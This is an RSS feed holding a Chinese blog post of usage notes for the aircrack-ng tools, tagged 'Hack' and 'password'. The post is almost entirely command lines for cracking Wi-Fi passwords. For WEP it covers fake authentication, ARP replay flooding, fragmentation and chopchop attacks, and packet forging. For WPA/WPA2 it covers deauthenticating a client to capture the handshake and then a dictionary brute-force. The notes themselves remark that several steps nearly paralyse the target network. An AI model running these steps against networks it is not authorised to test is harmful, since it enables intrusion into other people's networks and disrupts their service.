<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>
<channel>
	<title>apt-blog.net   无证程序员的PT桑 &#187; aircrack</title>
	<atom:link href="http://apt-blog.net/tag/aircrack/feed" rel="self" type="application/rss+xml" />
	<link>http://apt-blog.net</link>
	<description>潜逃中。</description>
	<lastBuildDate>Fri, 18 May 2012 11:25:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>aircrack-ng 系列工具使用笔记</title>
		<link>http://apt-blog.net/using_aircrack-ng</link>
		<comments>http://apt-blog.net/using_aircrack-ng#comments</comments>
		<pubDate>Sun, 07 Mar 2010 15:19:36 +0000</pubDate>
		<dc:creator>PT</dc:creator>
				<category><![CDATA[Unix/Linux]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[wifi]]></category>
		<guid isPermaLink="false">http://apt-blog.net/?p=741</guid>
		<description><![CDATA[初始化工作 airmon-ng start wlan0 9 打开一个网卡监听设备，并设置到channel 9; channel可用iwconfig修改 airodump-ng mon0 无参数启动airodump-ng可查看所有接收范围内的AP、Client信息 aireplay-ng -9 -e (bssid) -a (AP Mac) ath0 测试注入攻击链路质量 airodump-ng -c (channel) --bssid (AP Mac) -w output ath0 监听AP在频道的所有数据包并保存到output文件，此步应在以下步骤提到airodump的时候执行 WEP: aireplay-ng -1 0 -e (bssid) -a (AP Mac) -h (Host Mac) ath0 伪认证联机请求 aireplay-ng -1 6000 -o 1 -q 10 -e (bssid) -a (AP [...]]]></description>
			<content:encoded><![CDATA[<h3>初始化工作</h3>
<pre>airmon-ng start wlan0 9</pre>
<p>    打开一个网卡监听设备，并设置到channel 9; channel可用iwconfig修改</p>
<pre>airodump-ng mon0</pre>
<p>    无参数启动airodump-ng可查看所有接收范围内的AP、Client信息</p>
<pre>aireplay-ng -9 -e (bssid) -a (AP Mac) ath0</pre>
<p>    测试注入攻击链路质量</p>
<pre>airodump-ng -c (channel) --bssid (AP Mac) -w output ath0</pre>
<p>    监听AP在频道的所有数据包并保存到output文件，此步应在以下步骤提到airodump的时候执行</p>
<h3><a href="http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs">WEP:</a></h3>
<pre>aireplay-ng -1 0 -e (bssid) -a (AP Mac) -h (Host Mac) ath0</pre>
<p>    伪认证联机请求</p>
<pre>aireplay-ng -1 6000 -o 1 -q 10 -e (bssid) -a (AP Mac) -h (Host Mac) ath0</pre>
<p>    伪认证联机请求并发送保持在线数据</p>
<pre>airodump-ng -c (channel) --bssid (AP Mac) -w output ath0</pre>
<p>    监听收集</p>
<pre>aireplay-ng -3 -b (AP Mac) -h (Host Mac) ath0</pre>
<p>    监听arp报文，一旦出现就不断将该报文重发，使目标机器产生实际回应数据，发回更多IV数据。<br />
    此时若有“内奸”，即有可控制的已经连接在目标网段的机器，ping一个网段内不存在的IP即可产生这样一个arp报文，接下来可以运行aircrack破解了。注意这个步骤可能会对目标局域网产生类似ARP洪水攻击一样的效果，网内数据延时丢包都很严重。</p>
<h3><a href="http://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients">对于无机器连接的WEP</a>：</h3>
<pre>aireplay-ng -5 -b (AP Mac) -h (Host Mac) ath0</pre>
<p>    Fragmenation攻击，监听一个AP广播出来的数据包，并抽离有效的伪随机数据（PRGA），保存到fragment-XXXX-XXXXX.xor文件供下一步使用.<br />
    有时监听到的不是广播包，转发攻击后ap没有回应，一系列重试后程序会重新监听; 有时候可能需要不少时间，加-F参数可以自动应答。</p>
<pre>aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0 </pre>
<p>    chopchop攻击，上述攻击不奏效可试，相同作用</p>
<pre>packetforge-ng -0 -a (AP Mac) -h (Host Mac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request</pre>
<p>    根据fragment-0203-180343.xor文件的PRGA，产生arp请求包，保存到arp-request文件</p>
<p>    <a href="http://aircrack-ng.org/doku.php?id=arp_amplification">使用-k 192.168.1.1 -l 10.255.255.255可使AP产生两倍的有效IV，192.168.1.1为确实存在的IP，通常的网关<br />
    使用-k 192.168.1.89 -l 10.255.255.255可使AP产生三倍的有效IV，192.168.1.89为确实存在的客户端IP</a></p>
<pre>airodump-ng -c (channel) --bssid (AP Mac) -w output ath0</pre>
<p>    监听收集</p>
<pre>aireplay-ng -2 -r arp-request ath0</pre>
<p>    不断注入上述产生的arp-request报文<br />
    这一步也会使目标网络接近瘫痪，极大延时，丢包。</p>
<pre>aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (AP Map) -h (Host Mac) ath0</pre>
<p>    上述产生、发送arp-request的步骤可由这一步替换，这是转发任何一个收到的有效数据包，方便，缺点是若数据包较大，转发过程较慢。还可使用-r capture-01.cap读取以前读取的有效数据进行转发注入。</p>
<pre>aircrack-ng -b (AP Mac) capture*.cap </pre>
<p>    解密</p>
<pre>aircrack-ng -b (AP Mac) capture*.cap </pre>
<p>    另一种解密算法</p>
<h3><a href="http://aircrack-ng.org/doku.php?id=cracking_wpa">WPA/WPA2</a>:</h3>
<pre>airodump-ng -c (channel) --bssid (AP Mac) -w output ath0</pre>
<p>    监听捕捉另外一客户端与ap之间的连接，上方出现WPA handshake: xx:xx...为成功</p>
<pre>aireplay-ng -0 1 -a (AP Mac) -c (The Mac of a connected client) ath0</pre>
<p>    往已经连接到ap的一个客户端伪造一个离线包，使其离线重连以便捕捉handshake.<br />
    注意要收到ACK，才表明被攻击客户端收到，才会下线；发送离线不宜过密过多。</p>
<pre>aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 output*.cap</pre>
<p>    暴力破解。password.lst为密码字典，破解的成功率取决于字典的覆盖程度以及机器的速度。</p>
]]></content:encoded>
			<wfw:commentRss>http://apt-blog.net/using_aircrack-ng/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

